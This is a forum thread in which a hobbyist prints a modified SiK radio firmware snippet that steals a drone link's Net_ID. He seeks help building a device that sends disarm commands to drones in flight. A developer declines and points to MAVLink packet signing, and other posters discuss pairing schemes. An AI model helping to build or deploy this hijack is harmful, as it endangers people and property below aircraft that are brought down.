Project Status; Design
Project Progress; [∎∎∎ ]
Once the project is complete i will be publishing it here
My write-up on my Blog www.googlex.co.uk/blog...
Hello DiyDrone.com Community!
My name is Jack and i'm currently working on a project to do with an exploit recently discovered (Oct 2015) in the MavLink Protocol.
First off the Exploit;
The exploit is to do with the radio's method of authentication, They use the header 'Net_Id' to identify themselves to the other radio's during transmission of data.
Within the Sik-Firmware for the SiLabs Si1000 ISM Radio thier is a file named "radio.c" within this file thier is some code that pulls the devices 'Net_Id' and checks it against incoming data packets to check if they are ment for the radio that is recieving them.
This is the original code;
// decode the header
errcount = golay_decode(6, buf, gout);
if (gout[0] != netid[0] || gout[1] != netid[1]) {
// its not for our network ID
debug("netid %x %x\n",
(unsigned)gout[0],
(unsigned)gout[1]);
goto failed;
}
However some guy has been able to modify this code so that when the radio receives a data packet it reads it's 'Net_Id' and sets the 'Net_Id' of the radio that received the packet to the same as the one that was just received, then the radio is able
to issue a command to the drone that it has just stolen the 'Net_Id' from such as "CMD_DISARM" witch would intern disarm the drone mid-flight!
Here is the "Modified" Code;
// decode the header
errcount = golay_decode(6, buf, gout);
if (gout[0] != netid[0] || gout[1] != netid[1]) {
// its not for our network ID
/* Mod */
// Set our radio to use the captured packets
NetID param_set(PARAM_NETID, gout[0]))
// Save the value to flash
param_save();
// To read the new value we need to reboot. Rebooting
RSTSRC |= (1 << 4);
/* End of Mod*/
}
My problem(s) are as follows.
I Can't compile the modded firmware as all of my Linux computers refuse to install Mono-Develop :/
I would like to have this running on a standalone Hope-RF HM-TRP 433 chip that is connected to an arduino, The arduino would have a display that when a button is pressed the display shows something like LINE1 "Drone-B-Gone" LINE2 "Disarming all drones in the area!" and the arduino would use Serial.Send() to send the command to the Hope-RF chip that contains the packet "CMD_DISARM" that would disarm the quad in flight.
I have no way of flashing the Hope-RF HM-TRP chip! I read somewhere that an arduino Uno could be used however i have lost that link :(
I Have NO Arduino experience so i don't even know how i would start coding something like this
And now for my Questions!
1. Can i link several HopeRF HM-TRP Modules together?? What i mean by this is could i possibly have 434/868/915 Modules with the modded code all linked to together with the Tx and Rx pins and the same power source (DUH with different antennas) so that when the button is pressed no matter what telemetry band the drone is using it WILL cover it?
2. Can someone please send me in the right direction on how i can achieve what i have asked above with an arduino??
All help is greatly appreciated!
Links to prior Research
http://madhacker.org/how-to-hijack-a-drone-by-telemetry-and-prevent-it/
https://github.com/Dronecode/SiK
http://www.shellntel.com/blog/2015/9/25/drone-code-execution
http://rc-fpv.pl/viewtopic.php?t=8011
Obviously i am not doing this in malicious intent... ;)
Thanks a lot guys!!!
Peace out ~Jack
<-------------------------------- UPDATE-1 ----------------------------------->
Having Second thoughts on how i should do this,
I am pondering as to weather i should use an android tablet with the usb OTG wire.
This way (As Andre K pointed out) I would be showing more skills as i am a confident android developer so i could possibly make my own app that gives me a multitude of functions such as Follow me, Disable, Manual Control, RTH//RTL, Set new home and go their also i could do flight mode change. I think this would possibly help me demonstrate more skills?
What do you guys think? Start you response with UPDATE-1 ;)
~Jack
<------------------------------ UPDATE-1 END ------------------------------->
<-------------------------------- UPDATE-2 ----------------------------------->
Finally getting somewhere!
A HUGE Thanks to Marcin Krawczyk for recommending Fedora to me!
I Have finally got the HRM_TRP firmware package compiled :)
It is attached below, This is the Fw WITH the mod :)
LINK TO FW FILE <-- Not the correct upload!
I pulled an all niter doing this :S
~Jack
===
SUB UPDATE!
I accidentally uploaded the wrong file, this is the full dst output file :)
===
<------------------------------ UPDATE-2 END ------------------------------->
By Jack Rogers
© InkyHacker 2016
Replies
RECEIVED REPLY FROM TRIDGE HE IS UNABLE TO HELP!
I think it would be more correct to say I am unwilling to help. I pointed out to Jack that this project is similar to someone pointing out that most houses in country areas don't have locks, then to proceed to publish a housebreaking guide.
The Si1000 does not have the resources to do a properly secure protocol. Please see this work for information on what can be done on the stm32 and better processors to fix this:
https://docs.google.com/document/d/1ETle6qQRcaNWAmpG2wz0oOpFKSF_bcT...
Jack has expressed an interest in helping with that project, which I welcome. I don't think it is useful to help with a project to demonstrate how to attack drones however
Cheers, Tridge
Hi Tridge,
I read with interest your MAVLink 2.0 packet signing proposal.
If the problem is so serious as pointed out by Jack and for real, are you aware of any previous attemp to take control over one's MAVLink flown drone by a third person ?
To generate random pair of keys and to shake hands I would suggest one-time short-range NFC pairing since most of small model drones are purchased on-the-go to fly after a while, so no time for usb cabling, entering names, numbers by an operator.
If pairing failed there must be mechanism implemented to clear old values and to generate new key pair.
1. NFC pairing, key pair generated, hands shaked
(NFC pairing is safe, is private can be done indoor, at home)
2. Radio pairing is public , in outdoors
My2 Cents
Could you possibly have a hardware pairing process? What i mean by this is a 2 wire comm link between the 2 radio's when they are initially setup, This way both radios would be able to generate parts of a key and only the radio's have the key to decrypt the packet.
Scenario;
Radio 1 Chooses the characters in RED and Radio 2 Chooses the characters in BLUE
34UITH3789Y340349U65U
This way the radio's have both decided on a secure key and they will both encrypt the data and decrypt it on the transmit and arrival of the packets, Would this work???
By Jack
I will add mt 2 cents to this later when i figure out how it would work! just had a little ureka moment...
NFC pairing is fine, and could easily be used on top of the proposed signing protocol. It shouldn't be part of the protocol however, as that would preclude hardware that can't do it.
MAVLink 1.0 makes no attempt at security of any kind. It is trivial to take control if the transport is unprotected (as it is on 3dr radios). Automating it is equally trivial.
I don't know how many people have done it, but there is certainly no technical impediment.
Thanks Again Tridge :)
I have also emailed him on 3 separate email addresses i found of him as i don't know witch ones are active!
~Jack
Thanks alot man :D
-
1
-
2
-
3
-
4
-
5
of 5 Next